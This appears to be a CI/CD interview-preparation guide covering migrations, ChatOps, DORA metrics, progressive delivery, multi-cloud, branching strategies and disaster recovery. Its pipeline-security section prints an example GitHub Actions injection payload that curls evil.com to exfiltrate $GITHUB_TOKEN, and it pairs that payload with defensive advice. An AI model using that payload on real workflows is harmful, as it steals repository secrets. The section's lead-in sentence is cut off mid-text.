- “You need to rename a column from `username` to `display_name` with zero downtime. Walk me through it.” Deploy 1: Add `display_name` column. Write to both `username` and `display_name`. Read from `username`. Backfill `display_name` from `username` for existing rows. Deploy 2: Switch reads to `display_name`. Still write to both. Deploy 3: Stop writing to `username`. Once Deploy 3 is fully rolled out and no running code touches `username`, drop the column in a follow-up migration. Each step is independently safe because the schema is compatible with both the old and new code at every step.
- “A migration takes 30 minutes on the production database (100M rows). How do you handle it?” Never run a 30-minute migration in a blocking deploy step. Use a non-blocking approach: run the migration as a background job (pt-online-schema-change for MySQL, `pg_repack` or `CREATE INDEX CONCURRENTLY` for Postgres). These tools copy data in batches while the table remains available. For large data backfills, process in chunks of 10K-100K rows with a sleep between batches to avoid overwhelming the database. Track progress with a counter. Some teams run large migrations outside the CI/CD pipeline entirely, as a scheduled, monitored operation managed by the DBA team.
- “How do you test migrations before running them in production?” Run migrations against a clone of the production database (restored from a recent backup or snapshot). Measure: execution time, lock duration, error rate. Some teams maintain a “staging migration database” that’s a recent copy of production (anonymized). Run the migration against it as part of the staging deploy. If it takes 30 minutes on staging, you know it’ll take ~30 minutes on production. For critical migrations, also run an `EXPLAIN` on the generated SQL to verify it uses efficient execution plans.
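The expand and backfill steps of the `username` to `display_name` rename can be sketched with SQLite from the standard library. This is a toy model under simplifying assumptions (a `users` table with an integer `id`, tiny batches, no sleep between batches); a production backfill would run against the real database with much larger chunks and throttling.

```python
import sqlite3


def expand(conn: sqlite3.Connection) -> None:
    """Expand step: add the new nullable column; old code keeps working."""
    conn.execute("ALTER TABLE users ADD COLUMN display_name TEXT")
    conn.commit()


def backfill(conn: sqlite3.Connection, batch_size: int = 1000) -> int:
    """Copy username into display_name in small batches; return rows updated."""
    total = 0
    while True:
        cur = conn.execute(
            "UPDATE users SET display_name = username "
            "WHERE id IN ("
            "  SELECT id FROM users"
            "  WHERE display_name IS NULL AND username IS NOT NULL"
            "  LIMIT ?"
            ")",
            (batch_size,),
        )
        conn.commit()  # commit per batch so locks are held only briefly
        if cur.rowcount == 0:
            break
        total += cur.rowcount
    return total
```

Committing after every batch keeps each transaction short, and the `IS NULL` filter makes the job safe to stop and restart: rows that were already copied are simply skipped on the next run.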
49. ChatOps
- A team member types `/deploy myapp v2.3.0 to production` in Slack/Teams.
- A bot (Hubot, Slack bot, custom webhook) receives the command.
- The bot triggers the deployment pipeline (GitHub Actions workflow dispatch, Jenkins API call, ArgoCD sync).
- The bot posts real-time status updates: “Deploying… Smoke tests running… Deploy complete. 0 errors in the last 5 minutes.”
- The entire team sees the deployment happen in real-time.
- Visibility: Everyone sees who deployed what, when. No more “who deployed to prod at 3 AM?” — it’s in the chat log.
- Auditability: Chat history serves as an audit trail. Compliance teams can review deployment decisions.
- Collaboration: During an incident, the team coordinates in the chat room. “I’m rolling back v2.3.0.” “OK, I’ll monitor error rates.” All context is in one place.
- Onboarding: New engineers learn deployment procedures by watching the chat room. They see the commands, the workflow, and the responses.
- Democratization: Deploying to production shouldn’t require SSH access or CI dashboard access. A chat command is accessible to anyone with the right permissions.
- `/incident create "Payment processing degraded"`: creates an incident channel, pages on-call.
- `/status myapp`: shows current version, health, last deploy time.
- `/rollback myapp`: triggers a rollback with one command.
- `/lock prod "maintenance window"`: prevents deployments during a maintenance window.
- `/graph cpu myapp 1h`: renders a Grafana graph in chat.
- “How do you secure ChatOps to prevent unauthorized deployments?” Role-based access: only members of the `#deployments` channel or a specific Slack user group can trigger production deploys. The bot verifies the user’s identity against an ACL before executing. Require an explicit confirmation step: “To deploy to production, type `/deploy-confirm` within 60 seconds” (prevents accidental deploys). Log every command and its result. Rate limit: max 1 production deploy per hour (prevent rapid-fire deploys during panic).
- “How does ChatOps interact with GitOps?” ChatOps triggers a Git commit (the chat command creates a PR or pushes a change to the GitOps repo). ArgoCD detects the change and applies it. The chat room shows the ArgoCD sync status. This preserves the GitOps principle (Git is the source of truth) while providing the ChatOps UX (chat is the command interface). The bot doesn’t `kubectl apply` directly; it modifies Git, and GitOps handles the rest.
- “What are the failure modes of ChatOps?” (1) Bot goes down: deployments are blocked if the bot is the only way to deploy. Always have a fallback (direct CI trigger). (2) Chat platform outage (Slack goes down): can’t deploy. Run the bot on a fallback channel or have a CLI alternative. (3) Security: if the bot’s Slack token is compromised, anyone with the token can trigger deploys. Rotate tokens, use short-lived credentials, and monitor for unusual bot activity.
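The parse-then-authorize flow a deploy bot follows might look like the sketch below. Everything here is hypothetical: the `DEPLOYERS` table stands in for a real ACL or Slack user-group lookup, and the returned dictionary stands in for a call that triggers the pipeline.

```python
import re

_DEPLOY = re.compile(
    r"^/deploy (?P<app>[\w-]+) (?P<version>v\d+\.\d+\.\d+) to (?P<env>\w+)$"
)

# Hypothetical ACL: which users may deploy to which environment.
DEPLOYERS = {
    "production": {"alice"},
    "staging": {"alice", "bob"},
}


def handle(user, text):
    """Validate a /deploy command and check the caller against the ACL."""
    m = _DEPLOY.match(text.strip())
    if not m:
        return {"ok": False, "reason": "unrecognized command"}
    env = m.group("env")
    if user not in DEPLOYERS.get(env, set()):
        return {"ok": False, "reason": f"{user} may not deploy to {env}"}
    # A real bot would trigger the pipeline here and post status updates.
    return {"ok": True, "app": m.group("app"),
            "version": m.group("version"), "env": env}
```

The strict regular expression doubles as input validation: anything that is not an app name, a `vX.Y.Z` version, and a known environment is rejected before it can reach a shell or an API call.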
50. DORA Metrics
- Deployment Frequency (DF): How often does the team deploy to production?
  - Elite: Multiple times per day. High: Weekly to monthly. Low: Monthly to every 6 months.
  - Measures: CI/CD pipeline efficiency, team confidence, batch size.
  - How to improve: Smaller batches, trunk-based development, automated deployments, feature flags.
- Lead Time for Changes (LT): Time from code commit to running in production.
  - Elite: < 1 hour. High: 1 day to 1 week. Low: 1 month to 6 months.
  - Measures: Pipeline speed, review process efficiency, deployment automation.
  - How to improve: Faster CI pipelines, smaller PRs, automated testing, parallel stages, reduce manual approvals.
  - Breakdown: Coding time + PR review time + CI time + Deploy time. Measure each segment to find the bottleneck. Often, PR review wait time dominates.
- Change Failure Rate (CFR): What percentage of deployments cause a failure in production (requiring rollback, hotfix, or incident)?
  - Elite: 0-15%. High: 16-30%. Low: > 60%.
  - Measures: Test quality, code review effectiveness, deployment safety mechanisms.
  - How to improve: Better test coverage, canary deployments, feature flags, automated rollback, pre-production environments that mirror production.
- Mean Time to Restore Service (MTTR): How long from a production incident to full resolution?
  - Elite: < 1 hour. High: 1 day. Low: 1 week to 1 month.
  - Measures: Observability, incident response process, rollback capability.
  - How to improve: Better monitoring/alerting, runbooks, automated rollback, reduced blast radius (canary), incident response drills.
- Deployment Frequency: Count deployments per day/week (CI/CD tool API, deployment events).
- Lead Time: Git commit timestamp to production deploy timestamp (requires tagging deploys with the commit SHA).
- Change Failure Rate: Count incidents/rollbacks divided by total deployments (incident management tool + deployment tool).
- MTTR: Incident creation time to resolution time (PagerDuty, Opsgenie, incident management tool).
- Tools: Sleuth, LinearB, Haystack, Jellyfish, or custom dashboards with data from GitHub API + deployment tool + incident tool.
- “Your team’s lead time is 2 weeks. Where do you start investigating?” Break it down: Code to PR (how long does coding take?), PR to merge (how long do reviews take?), merge to deploy (how long does the pipeline take?). Usually, PR review wait time is the bottleneck — PRs sit for days waiting for reviews. Solutions: smaller PRs (easier to review quickly), review SLAs (review within 4 hours), pair programming (no async review needed), automated checks that reduce reviewer burden. A PR that takes 5 days to review and 10 minutes to deploy still has a 5-day lead time.
- “Is it possible to have high deployment frequency but also high change failure rate?” Yes, and it indicates a testing or quality problem. The team is deploying fast but deploying broken code. Root causes: insufficient test coverage, no pre-production validation, no canary analysis, pressure to ship without adequate review. The fix is not to slow down deployment frequency — it’s to improve the quality gates. Add automated testing, canary deployments, and post-deploy smoke tests. The goal is to increase frequency AND decrease failure rate simultaneously.
- “How do you prevent DORA metrics from being gamed?” Deployment frequency can be gamed by deploying no-ops. Lead time can be gamed by merging untested code quickly. CFR can be gamed by not tracking incidents. MTTR can be gamed by prematurely closing incidents. Mitigation: use metrics for team improvement, never for individual performance reviews. Review metrics alongside qualitative signals (is the team actually delivering value? are customers happy?). Focus on trends over time, not absolute numbers. Create a culture where metrics expose problems to fix, not blame to assign.
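The four measurements described in this section reduce to simple arithmetic once deploy and incident records are available. The sketch below assumes hypothetical record shapes (deploys as dictionaries with `committed_at`, `deployed_at`, and `failed`; incidents as `(opened, resolved)` pairs) and uses the median for lead time, which is one reasonable choice among several.

```python
from datetime import datetime
from statistics import mean, median


def dora_metrics(deploys, incidents, period_days):
    """Compute the four DORA metrics from deploy and incident records."""
    if not deploys:
        raise ValueError("need at least one deployment in the period")
    lead_hours = [
        (d["deployed_at"] - d["committed_at"]).total_seconds() / 3600
        for d in deploys
    ]
    restore_hours = [
        (resolved - opened).total_seconds() / 3600
        for opened, resolved in incidents
    ]
    return {
        "deploys_per_day": len(deploys) / period_days,
        "lead_time_hours": median(lead_hours),
        "change_failure_rate": sum(1 for d in deploys if d["failed"]) / len(deploys),
        # None when there were no incidents to restore from.
        "mttr_hours": mean(restore_hours) if restore_hours else None,
    }
```

Lead time here starts at the commit timestamp, which is why deploys need to be tagged with the commit SHA; measuring from PR creation or from first review would give a different, also useful, number.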
6. Advanced Topics
51. Pipeline Security: Injection Attacks
"; curl http://evil.com/steal?token=$GITHUB_TOKEN; echo ". The shell executes:- Never interpolate
`${{ }}` expressions directly into `run:` blocks. Instead, pass them as environment variables: set the value under the step’s `env:` key and reference the quoted shell variable (for example `"$PR_TITLE"`) in the script, so the shell treats the input as data rather than code.
- Use `actions/github-script` for complex logic instead of shell interpolation.
- Audit all workflows for `${{ }}` inside `run:` blocks. Tools: actionlint, zizmor.
- Restrict the `pull_request_target` trigger (it runs with base branch secrets but can access PR code).
- Jenkinsfile: Groovy string interpolation with untrusted input.
- Docker build args: `ARG BRANCH=$BRANCH_NAME`, where a malicious branch name could inject commands.
- Makefile targets called from CI with unsanitized variables.
- “How do you audit existing workflows for injection vulnerabilities?” Run `actionlint` (static analysis for GitHub Actions). Search for the pattern `${{ github.event` inside `run:` blocks. StepSecurity’s `harden-runner` action detects outbound network calls from workflows (catches exfiltration). For a thorough audit, treat every `${{ }}` expression in a `run:` block as a potential vulnerability and evaluate whether the source is trusted. PR titles, commit messages, issue bodies, and branch names are all attacker-controlled.
- “How does `pull_request_target` create a security risk?” For PRs from forks, `pull_request` runs the workflow with read-only access and no secrets. `pull_request_target` runs the workflow from the base branch (main) with full secrets and write access. If the workflow from main checks out the PR’s code (`actions/checkout` with `ref: ${{ github.event.pull_request.head.sha }}`) and runs it, the PR’s code now executes with main’s secrets. This is how external contributors can steal repository secrets.
- “What other supply chain risks exist in GitHub Actions beyond injection?” Typosquatting on actions (using `action/checkout` instead of `actions/checkout`). Compromised action tags (the `v3` tag is moved to a malicious commit; pin to a SHA instead). Excessive permissions on `GITHUB_TOKEN` (the default can be read/write depending on repository and organization settings; scope it to the minimum needed with a `permissions:` block). Workflow artifacts containing secrets. Self-hosted runners that accumulate state between jobs (a previous job’s credentials are accessible to the next job).
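The audit heuristic above, looking for attacker-controlled expressions inside `run:` blocks, can be approximated with a line scanner. This is a rough indentation-based sketch, not a YAML parser and not a substitute for actionlint or zizmor; the `UNTRUSTED` pattern covers only `github.event.*` and `github.head_ref`, which is an assumption chosen for brevity.

```python
import re

# Contexts an attacker can influence (a deliberately small, illustrative set).
UNTRUSTED = re.compile(r"\$\{\{\s*github\.(?:event\.|head_ref)")
RUN_KEY = re.compile(r"^(\s*)(- )?run:\s*(.*)$")


def find_injection_risks(workflow_text):
    """Return 1-based line numbers where untrusted input is inlined in run: scripts."""
    findings = []
    run_indent = None  # column of the `run:` key while inside a block scalar
    for lineno, line in enumerate(workflow_text.splitlines(), start=1):
        indent = len(line) - len(line.lstrip())
        if run_indent is not None:
            if line.strip() and indent <= run_indent:
                run_indent = None  # dedent: the script block has ended
            else:
                if UNTRUSTED.search(line):
                    findings.append(lineno)
                continue
        m = RUN_KEY.match(line)
        if m:
            key_col = len(m.group(1)) + (2 if m.group(2) else 0)
            rest = m.group(3)
            if rest[:1] in ("|", ">"):
                run_indent = key_col  # multi-line script follows
            elif UNTRUSTED.search(rest):
                findings.append(lineno)
    return findings
```

The same expression under `env:` is not flagged, which mirrors the recommended fix: the value reaches the script as an environment variable instead of being pasted into the shell source.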
52. Progressive Delivery
- CI/CD: Automates build, test, deploy. The artifact reaches production automatically.
- Progressive Delivery: Controls who sees the change and when, with automated safety checks at each stage.
- Traffic shifting: Route 1% -> 5% -> 25% -> 100% of traffic to the new version. Implemented via service mesh (Istio), ingress controller (NGINX), or application-level routing.
- Automated analysis: At each stage, compare canary metrics against baseline using statistical tests. Tools: Kayenta (Spinnaker), Argo Rollouts AnalysisRuns, Flagger.
- Automated rollback: If analysis fails at any stage, automatically route 100% of traffic back to the stable version. No human intervention needed.
- Feature flags: Control feature visibility independently of deployment. Gradually enable features for specific user segments.
- “How do you handle progressive delivery for backend services that don’t directly serve user traffic?” Measure internal metrics: queue processing latency, error rates in downstream services, database query performance. Use custom analysis templates that query Prometheus/Datadog for service-specific metrics. For event-driven services, compare event processing throughput and error rates between canary and baseline consumer groups.
- “What metrics would you use for an automated analysis template?” Golden signals: error rate (5xx), latency (p99), saturation (CPU > 80%). Business metrics: conversion rate, API success rate, revenue per request. Infrastructure: pod restart count, memory growth rate. The analysis template compares canary metrics against baseline (the same service running the old version during the same time window) using statistical significance tests.
- “How does progressive delivery interact with database migrations?” The database migration must complete successfully before any traffic is shifted to the new version. Use an Argo Rollouts `PrePromotionAnalysis` or a pre-sync hook to run migrations. If the migration fails, the rollout doesn’t proceed. If the migration succeeds but the new code has issues, the code can roll back while the database keeps the expanded schema (expand-contract pattern). This is why backward-compatible migrations are essential for progressive delivery.
53. Observability-Driven Deployment
- Metrics: Error rates, latency percentiles, throughput, CPU/memory. Used for automated canary analysis. “If p99 latency increases > 20% compared to baseline, rollback.”
- Logs: Structured log analysis during deployment. Watch for new error patterns, increased error volume, or specific error codes. “If ERROR log count increases 3x during canary, pause promotion.”
- Traces: Distributed tracing reveals where latency is introduced. “The new version adds 50ms to the database span in the checkout flow.” Useful for diagnosing why metrics changed, not just that they changed.
- Deploy markers: Annotate Grafana dashboards and Datadog dashboards with deployment events. This correlates metrics changes with specific deploys. “Latency spiked at 14:32 — oh, that’s when v2.3.0 deployed.”
- Automated anomaly detection: Tools like Datadog, New Relic, and Dynatrace can detect metric anomalies in real-time. Integrate with the deployment pipeline: if an anomaly is detected within 15 minutes of deployment, auto-pause or rollback.
- SLO-based deployment gates: Define Service Level Objectives (99.9% availability, p99 < 200ms). If a deployment would violate the SLO (error budget consumed), block it. Google’s SRE practices use error budget policies to gate deployments.
- Synthetic monitoring post-deploy: Datadog Synthetics, New Relic Synthetics run scripted user journeys every minute from multiple global locations. If synthetic checks fail after deployment, alert and rollback.
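The two quoted rules from the Metrics and Logs bullets can be expressed as a small gate function. This is a sketch under assumptions: latencies arrive as plain lists of samples, error-log counts are already normalized to comparable traffic volumes, and the function names are hypothetical.

```python
import math


def p99(samples):
    """Nearest-rank 99th percentile of a non-empty list of latencies."""
    ordered = sorted(samples)
    rank = math.ceil(0.99 * len(ordered))  # 1-based rank
    return ordered[rank - 1]


def deployment_decision(base_latencies, canary_latencies,
                        base_error_logs, canary_error_logs):
    """Apply the two example rules from the text, latency first."""
    # "If p99 latency increases > 20% compared to baseline, rollback."
    if p99(canary_latencies) > 1.20 * p99(base_latencies):
        return "rollback"
    # "If ERROR log count increases 3x during canary, pause promotion."
    if canary_error_logs > 0 and canary_error_logs >= 3 * base_error_logs:
        return "pause"
    return "promote"
```

Checking latency before logs is a design choice in this sketch: a latency regression maps to the stronger action (rollback), so it is evaluated first.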
- “How do you set thresholds for automated rollback without being too sensitive or too lenient?” Start with relative thresholds (canary vs baseline), not absolute thresholds. “If canary error rate is 2x baseline” is better than “if error rate exceeds 1%” because baseline already accounts for normal variance. Use statistical tests rather than simple threshold checks to reduce false positives. Tune over time: start lenient (avoid false rollbacks), tighten as you gain confidence. Track how many automated rollbacks were justified vs false positives.
- “How do you distinguish deployment-caused issues from unrelated production issues?” Correlation, not causation. Did the metric change coincide with a deployment? Did it affect only the canary pods or all pods? Is the issue in the changed service or a dependent service? Use deployment markers on dashboards. If the baseline (old version) also shows degradation, the issue is external (not deployment-caused). If only the canary shows degradation, it’s likely deployment-caused.
- “What’s an error budget and how does it relate to deployments?” If your SLO is 99.9% availability (43 minutes of downtime per month), your error budget is 0.1% (43 minutes). If a deployment consumes 20 minutes of error budget, you have 23 minutes left. If the error budget is exhausted, freeze deployments (except reliability improvements) until the budget recovers. This creates a natural brake: deploy fast when things are stable, slow down when stability is low. Google SRE teams enforce this formally.
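The error budget arithmetic is easy to check in code. The sketch below assumes a 30-day window; the function names are illustrative and not taken from any SRE tool.

```python
MINUTES_PER_30_DAYS = 30 * 24 * 60  # 43,200 minutes


def error_budget_minutes(slo_percent, window_minutes=MINUTES_PER_30_DAYS):
    """Total allowed downtime for the window, in minutes."""
    return window_minutes * (100 - slo_percent) / 100


def deploys_allowed(slo_percent, consumed_minutes):
    """Return (allowed, remaining_minutes) under a simple freeze policy."""
    remaining = error_budget_minutes(slo_percent) - consumed_minutes
    return remaining > 0, remaining
```

With a 99.9% SLO this gives a budget of about 43.2 minutes. After a deployment that consumes 20 minutes, about 23.2 minutes remain and deploys stay allowed. Once consumption reaches the full budget, `deploys_allowed` returns `False`, which is the freeze described above.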
54. Multi-Cloud and Hybrid CI/CD
- Different APIs and tools: Each cloud has its own deployment mechanisms (EKS vs GKE vs AKS, S3 vs GCS vs Azure Blob). The pipeline needs cloud-specific steps.
- Credential management: Separate IAM/service account credentials per cloud. OIDC federation needs separate configuration for each cloud provider.
- Networking: Deploying to on-prem requires network connectivity from CI runners to internal infrastructure. VPN, Direct Connect, or self-hosted runners inside the corporate network.
- Testing: “Works on AWS” doesn’t mean “works on GCP.” Cloud-specific behaviors (IAM policies, network configurations, managed service quirks) need cloud-specific testing.
- Abstraction layer: Use Kubernetes as the common deployment target. Build Docker images once, deploy to EKS, GKE, and AKS with the same Helm charts. Differences are in the infrastructure layer (managed by Terraform per cloud), not the application layer.
- Terraform modules per cloud: Shared module interface with cloud-specific implementations. `modules/database/aws/`, `modules/database/gcp/`. Same variables, different resources.
- Pipeline templates: Shared CI logic for build/test, cloud-specific steps for deploy. GitHub Actions reusable workflows with cloud-specific deployment jobs.
- GitOps per cluster: ArgoCD running in each cluster, all pointing to the same Git repo. A commit deploys to all clusters simultaneously (or sequentially with promotion).
- “How do you handle a deploy that succeeds in AWS but fails in GCP?” Each cloud deployment should be independent and capable of rollback independently. Use circuit breakers: if GCP deploy fails, don’t rollback AWS (it’s working fine). Investigate the GCP-specific failure (usually IAM, networking, or managed service configuration differences). Maintain cloud-specific integration tests that run against each provider’s environment.
- “How do you manage Terraform state across multiple clouds?” Separate state per cloud provider and per environment. AWS state in S3, GCP state in GCS (or a single backend for simplicity — both can be in S3). Each cloud has its own Terraform configuration, providers, and state. Use Terragrunt for DRY configuration across environments and clouds. Never share state between clouds — a failed AWS apply should not block GCP.
- “What’s the argument for and against multi-cloud?” For: avoid vendor lock-in, negotiate better pricing, regulatory requirements (data must be in specific regions), disaster recovery (cloud provider outage). Against: increased complexity (2x the tooling, 2x the expertise, 2x the maintenance), lowest-common-denominator design (can’t use cloud-specific best features), higher cost (managing 2 clouds is more expensive than optimizing 1). Most companies are better off going deep on one cloud and using multi-region within that cloud for resilience.
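The "independent deploy, independent rollback" idea from the AWS-versus-GCP question can be sketched as follows. The `deploy` and `rollback` callables are hypothetical hooks standing in for real cloud-specific pipeline jobs; nothing here is a real provider API.

```python
def deploy_everywhere(version, targets):
    """Deploy `version` to each cloud independently.

    `targets` maps a cloud name to a (deploy, rollback) pair of callables.
    A failure in one cloud rolls back only that cloud.
    """
    results = {}
    for cloud, (deploy, rollback) in targets.items():
        try:
            deploy(version)
            results[cloud] = "deployed"
        except Exception as exc:
            rollback()  # only the failing cloud is rolled back
            results[cloud] = f"rolled_back: {exc}"
    return results
```

The result map keeps the per-cloud outcome, so a pipeline could mark the run as partially successful and open an investigation for the failing provider without touching the healthy one.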
55. Trunk-Based Development vs GitFlow in CI/CD
- All developers commit to `main` (trunk) directly or via very short-lived feature branches (< 1-2 days).
- `main` is always in a deployable state.
- Feature flags hide incomplete work from users.
- CI runs on every commit to main. CD deploys from main.
- Who uses it: Google (all 25,000+ engineers commit to a single trunk), Facebook, Netflix, most high-performing teams.
- Prerequisite: Strong test suite, feature flags, automated deployments, team discipline.
- Long-lived `develop` branch for integration. Feature branches merge to `develop`. Release branches cut from `develop`. Hotfix branches from `main`.
- CI runs on `develop`. CD deploys from release branches after stabilization.
- Who uses it: Teams with scheduled releases (every 2 weeks), packaged software, mobile apps (App Store review cycle forces batched releases).
- Problem with CI/CD: Feature branches live for days/weeks. Integration only happens at merge time. “Integration hell” returns. CI on feature branches tests in isolation, not integration. The `develop` branch is often broken because merging 3 feature branches simultaneously introduces conflicts.
| Factor | Trunk-Based | GitFlow |
|---|---|---|
| Integration frequency | Every commit | Every merge to develop |
| Deployment frequency | Multiple/day | Every sprint |
| Merge conflicts | Rare (small changes) | Common (large merges) |
| Feature flags needed? | Yes | No (branches isolate) |
| Rollback | Deploy previous commit | Complex branch management |
- “How do you handle half-finished features on trunk?” Feature flags. The code is on trunk but hidden behind `if (featureFlags.isEnabled('new-checkout'))`. The flag is `off` for all users until the feature is complete. This allows: continuous integration (code is merged early and often), deployment at any time (the flag is off), gradual rollout (enable for internal users, then 5% of users, then everyone), and instant “rollback” (toggle the flag off). The trade-off: feature flag tech debt. You must clean up flags after features launch.
- “A team of 50 developers all committing to trunk. How do you prevent chaos?” Strong CI is the gatekeeper. Every PR runs comprehensive tests in under 10 minutes. Merge queues (GitHub Merge Queue, Bors) serialize merges and verify each one against trunk before merging. If PR A and PR B both pass individually but conflict with each other, the merge queue catches it. Codeowners enforce review from domain experts. Small PRs (under 200 lines) are expected and enforced by policy. Google runs this at 25,000+ engineers scale using their Submit Queue.
- “When would you recommend GitFlow over trunk-based development?” When you need to maintain multiple versions simultaneously (v1.0 receives patches while v2.0 is in development). When your release cycle is externally constrained (App Store review, hardware release cycles, regulatory approval). When the team lacks the test coverage and feature flag infrastructure needed for trunk-based development. But I’d always advocate for moving toward trunk-based as the team matures — the benefits for CI/CD effectiveness are substantial.
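The gradual rollout described for feature flags (internal users, then 5%, then everyone) is commonly built on stable hashing. The class below is a Python sketch of that idea, not the API of any particular flag service. `FeatureFlags`, `set_rollout`, and `is_enabled` are illustrative names, the last loosely mirroring the `featureFlags.isEnabled(...)` call quoted above.

```python
import hashlib


class FeatureFlags:
    def __init__(self):
        self._rollout = {}    # flag name -> percentage of users (0-100)
        self._allowlist = {}  # flag name -> user ids that are always enabled

    def set_rollout(self, flag, percent, allow=()):
        self._rollout[flag] = percent
        self._allowlist[flag] = set(allow)

    def is_enabled(self, flag, user_id):
        if user_id in self._allowlist.get(flag, ()):
            return True  # e.g. internal users
        percent = self._rollout.get(flag, 0)  # unknown flags are off
        digest = hashlib.sha256(f"{flag}:{user_id}".encode()).digest()
        bucket = int.from_bytes(digest[:4], "big") % 100  # stable 0-99 bucket
        return bucket < percent
```

Because each user's bucket is derived from a hash rather than a random draw, a user who sees the feature at 5% still sees it at 25%, and setting the percentage back to 0 acts as the instant "rollback" for everyone outside the allowlist.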
56. Disaster Recovery for CI/CD Infrastructure
- CI platform: GitHub Actions outage, Jenkins controller crash, GitLab.com incident.
- Artifact registry: ECR outage, Artifactory disk full.
- Secret manager: Vault sealed, AWS Secrets Manager throttled.
- Git hosting: GitHub/GitLab unavailable.
- Multi-platform readiness: Have a backup CI system. If GitHub Actions is down, can you trigger a Jenkins pipeline? Many teams don’t need a full backup, but having a documented manual deploy process (the commands you’d run if CI didn’t exist) is essential.
- Artifact registry redundancy: Mirror critical images across regions or registries. If ECR in us-east-1 is down, pull from us-west-2. Use Kubernetes `imagePullPolicy: IfNotPresent` so pods that restart on nodes with the image already cached can start without reaching the registry.
- Break-glass procedures: A documented, tested process for deploying without the normal CI/CD pipeline. “In an emergency, an SRE can run `kubectl set image deployment/myapp myapp=ecr.aws/myapp:sha123` directly.” This bypasses CI but should require two-person approval and be logged.
- GitOps resilience: ArgoCD running in the cluster continues to reconcile even if the Git platform is temporarily unavailable (it caches the last known state). But new deployments are blocked until Git is back.
- “How do you backup Jenkins configuration?” Jenkins Configuration as Code (JCasC) plugin stores Jenkins config in YAML files in Git. Job definitions are in Jenkinsfiles (already in Git). Plugin list and versions stored in a `plugins.txt` file. To restore: spin up a new Jenkins instance, apply JCasC, install plugins, point to the Git repos. Recovery time: 30 minutes. Without JCasC, you need filesystem backups of `$JENKINS_HOME`, which is harder to restore and test.
- “Your artifact registry is down and a critical hotfix needs to go out. What do you do?” Check if the image is cached on Kubernetes nodes (`imagePullPolicy: IfNotPresent` would use the cached version). Build the image locally and push to a backup registry (Docker Hub, a different region’s ECR). Update the deployment to pull from the backup registry. Or, if the hotfix is a config change (not a code change), use ConfigMap/environment variable updates that don’t require a new image pull. After recovery, re-push to the primary registry and restore the normal pull path.
- “How do you ensure the break-glass procedure doesn’t become a bypass for normal CI/CD?” Log every break-glass usage. Require multi-person approval (two SREs must sign off). Auto-create a post-incident ticket for every break-glass deploy. Review break-glass usage in monthly operations reviews. If break-glass is used more than once a quarter for non-DR reasons, the CI/CD system has a reliability problem to fix. Rate-limit break-glass access (auto-expire elevated permissions after 4 hours).
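The break-glass controls listed above (logging, two sign-offs, auto-expiry after 4 hours) can be modeled in a short sketch. Everything here is hypothetical: the in-memory `audit_log` stands in for a real append-only audit store, and excluding the requester from the approver count is an assumed policy choice, not something the text specifies.

```python
import time

ACCESS_TTL_SECONDS = 4 * 60 * 60  # elevated access expires after 4 hours
audit_log = []  # stand-in for a real append-only audit store


def request_break_glass(requester, approvers, reason, now=None):
    """Grant temporary deploy access if two distinct SREs sign off.

    Assumption: the requester cannot approve their own request.
    Every request is logged, whether or not it is granted.
    """
    now = time.time() if now is None else now
    distinct = set(approvers) - {requester}
    granted = len(distinct) >= 2
    audit_log.append({"requester": requester, "approvers": sorted(distinct),
                      "reason": reason, "granted": granted, "at": now})
    if not granted:
        return None
    return {"user": requester, "expires_at": now + ACCESS_TTL_SECONDS}


def access_is_valid(grant, now=None):
    """True while a grant exists and has not yet expired."""
    now = time.time() if now is None else now
    return grant is not None and now < grant["expires_at"]
```

Logging denied requests as well as granted ones gives the monthly review a full picture of how often people reach for the emergency path.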
57. CI/CD for Monoliths vs Microservices
- Single pipeline: One repo, one build, one artifact, one deploy. Simple and fast.
- Testing: Full test suite runs on every change. As the monolith grows, this gets slow (30+ minutes for large monoliths).
- Deployment: Deploy the entire application for every change, even a one-line fix. A bug in the payment module blocks a deploy of a login fix.
- Scaling challenge: As the team grows, merge conflicts increase. PR queue grows. Pipeline becomes a bottleneck. Google’s monorepo approach mitigates this with affected-only testing, but most teams don’t have Google’s tooling.
- Rollback: All-or-nothing. Rolling back one feature rolls back everything.
- Pipeline per service: Each service has its own pipeline, independent build, test, and deploy. A change to the payment service doesn’t trigger the user service pipeline.
- Testing: Unit and integration tests per service (fast). Cross-service testing via contract tests (not E2E across all services). Testing the full system requires a “staging environment” where all services are deployed.
- Deployment: Deploy services independently. The payment team can deploy 5 times a day without affecting the user team.
- Scaling challenge: 50 services = 50 pipelines to maintain. Shared CI configuration drifts. Environment management is complex (which versions of which services are running in staging?). “It works on my service but breaks when Service B is at version X.”
- Rollback: Independent per service. Rolling back the payment service doesn’t affect other services (if API contracts are maintained).
| Aspect | Monolith | Microservices |
|---|---|---|
| Pipeline count | 1 | N (one per service) |
| Deploy independence | None | Full |
| Testing strategy | Full regression | Per-service + contracts |
| Environment complexity | Low | High (N x M versions) |
| Pipeline maintenance | Centralized | Distributed (shared templates) |
- “How do you manage CI/CD configuration across 50 microservice repos?” Shared pipeline templates. GitHub Actions reusable workflows in a central `ci-templates` repo. Each service’s workflow is 5-10 lines that call the shared template with service-specific parameters (language, Docker context, deployment target). The platform team owns and versions the templates. Services pin to a template version and upgrade on their schedule. This prevents 50 copies of the same pipeline drifting apart.
- “How do you test cross-service interactions in a microservice CI/CD?” Contract tests (Pact) in each service’s pipeline verify API compatibility. A shared “integration environment” where all services are deployed runs nightly E2E tests covering critical user journeys. For PR-level testing, use service virtualization (WireMock, Hoverfly) to mock dependent services based on their published contracts. The key insight: you should NOT deploy all 50 services to test one service’s PR.
- “You’re splitting a monolith into microservices. How do you evolve the CI/CD?” Strangler Fig pattern applied to CI/CD. Extract one service at a time. The monolith keeps its pipeline. The extracted service gets its own pipeline and repo (or monorepo project). The monolith’s pipeline adds an integration test that verifies the extracted service’s API. Over time, functionality moves from the monolith pipeline to individual service pipelines. Don’t try to refactor CI/CD all at once — it mirrors the architectural migration.
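When extracted services live as projects in one repository, "pipeline per service" depends on mapping changed files to the pipelines that need to run. The sketch below assumes a hypothetical layout with services under `services/<name>/` and shared code under `libs/` or `ci-templates/`. Real CI systems usually express this with path filters in their own configuration.

```python
from pathlib import PurePosixPath

# Hypothetical layout: shared code lives under these prefixes.
SHARED_PREFIXES = ("libs/", "ci-templates/")


def pipelines_to_run(changed_files, all_services):
    """Return the set of service pipelines a change should trigger."""
    affected = set()
    for path in changed_files:
        if path.startswith(SHARED_PREFIXES):
            return set(all_services)  # shared code changed: run everything
        parts = PurePosixPath(path).parts
        if len(parts) >= 2 and parts[0] == "services" and parts[1] in all_services:
            affected.add(parts[1])
    return affected
```

A change under `services/payment/` triggers only the payment pipeline, while a change to a shared library conservatively triggers all of them. Files outside both areas, such as a top-level README, trigger nothing.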
58. Cost Optimization in CI/CD
